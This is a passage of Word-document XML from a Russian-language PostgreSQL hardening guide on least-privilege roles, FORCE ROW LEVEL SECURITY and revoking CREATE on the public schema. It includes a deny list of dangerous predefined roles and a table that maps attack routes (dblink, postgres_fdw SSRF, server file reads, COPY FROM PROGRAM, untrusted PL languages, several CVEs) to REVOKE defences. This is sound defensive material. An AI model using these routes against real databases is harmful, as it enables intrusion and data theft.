        <w:t xml:space="preserve"> — нужен только для logical replication setup.</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pg_maintain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MAINTAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> privilege (PG 17+) — может быть нужен для maintenance jobs, но не для request-handling code.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LOGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без обоснования — service-роли часто не должны логиниться напрямую; используйте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INHERIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через owner-роль.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">По обоснованию (audit):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на схеме — нужен только если application создаёт временные / runtime объекты. Иначе — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USAGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> достаточно.</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на функциях — давать конкретные функции через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT EXECUTE ON FUNCTION ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE ON ALL FUNCTIONS IN SCHEMA</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TRIGGER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обычно не нужен.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Predefined roles из 2.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL ввёл predefined roles в PG 14 для типичных permission bundles. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Безопасно грантить</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с уточнением use-case):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pg_read_all_settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — DBA tooling, monitoring; не для request-handling.</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pg_read_all_stats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — monitoring exporters.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pg_monitor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bundle для monitoring (pg_read_all_settings + pg_read_all_stats + pg_stat_scan_tables).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Никогда не грантить application:</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pg_write_all_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обход per-table ACL.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 RCE-enabler.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 file r/w на сервере.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pg_signal_backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — может прервать чужие сессии (DoS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Использование predefined roles требует явного решения «нужно ли application именно это, или это design smell». Применение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_monitor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к app-роли «потому что удобнее» — типичная ошибка privilege creep.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица: какие категории 3.X блокируются отсутствием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Минимальная привилегия для атаки</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Защита через REVOKE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3.6.1 dblink_connect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USAGE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> on dblink extension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 ставить dblink (5.4)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3.6.2 postgres_fdw SSRF</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USAGE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> on postgres_fdw + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> server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 ставить postgres_fdw (5.4)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3.6.3 pg_read_server_files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pg_read_server_files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или SUPERUSER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REVOKE / не выдавать</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3.6.4 lo_import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pg_read_server_files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или SUPERUSER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REVOKE / не выдавать</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COPY FROM PROGRAM</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pg_execute_server_program</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или SUPERUSER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REVOKE / не выдавать</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 plperlu / 3.7.3 plpython3u</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USAGE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> on plperlu/plpython3u (SUPERUSER-only по умолчанию)</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 ставить untrusted PL (5.4)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 SET ROLE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право на target-роль через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GRANT role TO ...</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Audit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_auth_members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3.13.2 schema_element CVE-2023-2454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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на DB</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REVOKE CREATE ON DATABASE FROM PUBLIC</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3.13.3 autovacuum CVE-2022-1552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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на любой schema</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REVOKE CREATE ON SCHEMA public FROM PUBLIC</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3.13.4 extension scripts CVE-2022-2625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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на schema</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 же</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3.13.5 trusted extensions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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на DB</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REVOKE CREATE ON DATABASE FROM PUBLIC</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3.16.X identifier injection в SECURITY DEFINER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право EXECUTE на SD-функцию</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Audit SD-функции (5.3 + 3.17.5)</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3.17.5 SD + RLS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право EXECUTE на SD-функцию + ownership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FORCE ROW LEVEL SECURITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">По умолчанию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE POLICY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> применяется ко всем ролям </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">кроме owner таблицы и superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 3.17.0). В multi-tenant deployment это типичная ошибка: tenant-данные принадлежат application-роли, и RLS-policy её не фильтрует.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применяет policy даже к owner:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE app.orders ENABLE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ALTER TABLE app.orders FORCE ROW LEVEL SECURITY;</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CREATE POLICY tenant_isolation ON app.orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('app.tenant_id')::int)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WITH CHECK (tenant_id = current_setting('app.tenant_id')::int);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">С </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FORCE RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> даже SECURITY DEFINER функция, owned application-ролью, не bypass-нет policy. Защищает от 3.17.5 и от unknown future CVE класса RLS-обход для owner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда не нужно</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FORCE RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: superuser-owned tables, где владелец требует unfiltered access для maintenance jobs. В этом случае — отдельная сервисная роль с </w:t>
      </w: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 для maintenance, основной owner — без.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE CREATE ON SCHEMA public FROM PUBLIC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В PG ≤14 схема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по умолчанию доступна для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> всем ролям. Это enabler для нескольких категорий 3.13 (extension hijack, trojan-функции в search_path). В PG 15+ это поведение исправлено на новых кластерах, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade-нутые кластеры сохраняют старые ACL</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Проверка:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT nspname, nspacl FROM pg_namespace WHERE nspname = 'public';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Если в nspacl есть запись с правом C (CREATE) для PUBLIC — нужно REVOKE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс на upgrade-нутом кластере:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE CREATE ON SCHEMA public FROM PUBLIC;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- При необходимости — GRANT для конкретных нужных ролей:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT CREATE ON SCHEMA public TO migration_runner;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Схема ownership и schema-per-role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pattern для multi-tenant: каждый tenant получает свою схему, owned tenant-роль. Tenant имеет полные права в своей схеме, USAGE — на shared. Это структурно изолирует tenant-ы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
